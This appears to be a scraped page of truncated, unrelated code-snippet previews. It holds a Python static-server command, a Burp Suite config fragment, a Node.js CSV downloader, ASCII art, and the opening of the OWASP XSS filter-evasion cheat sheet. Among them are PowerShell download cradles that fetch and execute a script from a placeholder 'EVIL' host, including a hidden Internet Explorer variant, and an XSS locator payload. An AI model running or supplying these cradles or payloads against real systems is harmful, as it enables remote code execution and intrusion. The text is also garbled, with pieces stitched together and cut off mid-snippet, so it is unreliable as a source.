Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
{ | |
"project_options":{ | |
"connections":{ | |
"hostname_resolution":[], | |
"out_of_scope_requests":{ | |
"advanced_mode":false, | |
"drop_all_out_of_scope":false, | |
"exclude":[], | |
"include":[], | |
"scope_option":"suite" |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
var request = require('request'); | |
var unzip = require('unzip'); | |
var csv2 = require('csv2'); | |
request.get('http://s3.amazonaws.com/alexa-static/top-1m.csv.zip') | |
.pipe(unzip.Parse()) | |
.on('entry', function (entry) { | |
entry.pipe(csv2()).on('data', console.log); | |
}) | |
; |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
" _ _ " | |
" _ /|| . . ||\ _ " | |
" ( } \||D ' ' ' C||/ { % " | |
" | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
" |_\_ |----| |----| _/_|" | |
" | |/ | | | | \| |" | |
" | /_ | | | | _\ |" | |
It is all fun and games until someone gets hacked! |
# | |
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet | |
# based on the RSnake original http://ha.ckers.org/xss.html | |
# Retrieved on 2013-11-20 | |
# Much of this wildly obsolete | |
# | |
# XSS Locator 2 | |
'';!--"<XSS>=&{()} |